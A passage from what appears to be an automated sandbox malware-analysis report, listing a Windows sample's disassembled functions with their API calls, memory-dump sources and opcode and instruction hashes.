                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a68545afe61d840d47d3f1b1d3b03a98aa3fbbe1ee52399c340d1ced92b4485
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC713D72B08A828AEB10DF65D0913FC3770FB95B88F498631DA0DA7A9ADF39D145C744
                                                                                                                                                                                                                    Function 00007FF656CEE67C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3659116390-0
                                                                                                                                                                                                                    • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                                                                                                                                    • Instruction ID: 16311f902b2321e95536c453daf3142e3d2f44914cd55f42e86b83aea14c5fa8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85510372E14A5289E711CF65E4813AC7BB0FB49B98F088236CE4EA7799DF39D445C700
                                                                                                                                                                                                                    Function 00007FF656D50084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3740051246-0
                                                                                                                                                                                                                    • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                                                                                                                    • Instruction ID: 36e2c5cf4b806654aa860b30ae23a51c8ce66f77b115cdec1172906ab0daa40d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5761A072A0CA8285EB10DB65D4903BD7B70FB94788F488631DA4DA7B66CF7DD145CB40
                                                                                                                                                                                                                    Function 00007FF656D4D0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D176
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D217
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D236
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D281
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF656D4C2BF), ref: 00007FF656D4D2A0
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD4120: WideCharToMultiByte.KERNEL32 ref: 00007FF656CD4160
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD4120: WideCharToMultiByte.KERNEL32 ref: 00007FF656CD419C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                                                                                                    • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                                                                                                                    • Instruction ID: bafc6540d631a2e2d714b6242f3455b10668269eee14fe8b5c2d0e05e4304522
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14516B72B04B4685EB10DF56D8801AC73B4FB98F85B894632DE9EA3366DFB9D841C700
                                                                                                                                                                                                                    Function 00007FF656D2670C Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                                                                                    • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                                                                                                                                    • Instruction ID: 02b7393c1c13ace4411c9b64439a18fd5bf13bb387f4f31689f70a8b6940e085
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27514273A24B8592DB10CF15D4847AD73B4FB84B80F468222DB4E837A4EF3AE498C700
                                                                                                                                                                                                                    Function 00007FF656CF2998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                                                                                                                                                    • Instruction ID: d812e70d9e18af858ac698cbbb291a309ca94def2826dc96a83645df1e4b84a2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0251AFA2A0878285EB718F619440179B7B5EF44BA0F6C4731DEAFA76D4DE3EE841C700
                                                                                                                                                                                                                    Function 00007FF656D396A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                                                                                    • Opcode ID: f4c93beb746f8f0313865369d45e530b9a86d01caa28c888c43b47393c053cdf
                                                                                                                                                                                                                    • Instruction ID: 262be56f33d7e1e49fb57c064fc55c2c411176dacd33efe7cae81ae66dd15835
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4c93beb746f8f0313865369d45e530b9a86d01caa28c888c43b47393c053cdf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71510876A18A4282EB14DF26E49016A7770FB88F94F488532EF8E97766DF3DE440C740
                                                                                                                                                                                                                    Function 00007FF656CB1CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                                                                                    • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                                                                                                                    • Instruction ID: d29fd6842f29a328125edae36d0b89354620d6c5355de7bf05fa052fd3e0e68a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1751D072B086828BE758CF35D5405AAB7A0FB45794F180731EB5AA3BE5CF39E491CB00
                                                                                                                                                                                                                    Function 00007FF656CEBA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 190572456-0
                                                                                                                                                                                                                    • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                                                                                                                    • Instruction ID: f4e2485ca212e188266048fd9b2a9d8d539ea33d7e974debd8522af0d10eda7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E41B3A1F19A4381EE169F06A9512B563B5BF48BD0F0D4635DD5DEB398EE3EE848C300
                                                                                                                                                                                                                    Function 00007FF656D5FF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2939132127-0
                                                                                                                                                                                                                    • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                                                                                                                    • Instruction ID: 2e46b18132a722b784d2cb1cf34a2c5fee68dad75afbb7fb85e36b95c6ea7b2e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C251923290978681EB60CF16D54467837A0EB85B88F2C4B32CA4DA77A4CF7FE486C710
                                                                                                                                                                                                                    Function 00007FF656D1D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                                                    • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                                                                                                                                    • Instruction ID: 09ad4124223d266c2a63fcd9f8af1565c0f58cc45a956d7296bf668a8150c884
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31E73660864587E720CF29E45866973A1F788BA8F480735EE5ED7794CF7EE885C700
                                                                                                                                                                                                                    Function 00007FF656D33824 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                                                                                                    • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                                                                                                                                    • Instruction ID: 1b622af7a0ebb1790b868ace9006c330f620c797d371317dba28b1c564b5c16d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90416032E0D6C2C6FBA08F28E9547792790AF45B48F1D0B35D94DE65A5CE2FE485C710
                                                                                                                                                                                                                    Function 00007FF656D21B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2655805287-0
                                                                                                                                                                                                                    • Opcode ID: d2999549d8d9edbdb2461490abeeb98f6cb8cc82961b31ad74a9fcb842f6bf64
                                                                                                                                                                                                                    • Instruction ID: 6fd0345e32c61b1dcea53d7cb966b7c388f598b5d7f40d5c772b98babb6c40e3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2999549d8d9edbdb2461490abeeb98f6cb8cc82961b31ad74a9fcb842f6bf64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E221C722B0978246EB14DB22AD1527966A0FF89FE0F488B30EE5DE7795DE3DD440C700
                                                                                                                                                                                                                    Function 00007FF656CB2370 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                                                                                                    • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                                                                                                                                                    • Instruction ID: fe8788135e73a69456616da870be8e2dc9dd688507331d7a7d0263f9b6a5ccee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7331697191C7428AE7508F01E844339B7A4FB88B94F980B39D94AE7B60CF7EE585DB01
                                                                                                                                                                                                                    Function 00007FF656D42E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                                                                                    • Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
                                                                                                                                                                                                                    • Instruction ID: 84a4bd5713f4848f2068fded2353a70fb138d29033b8526e5bacc531dfe5e8bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
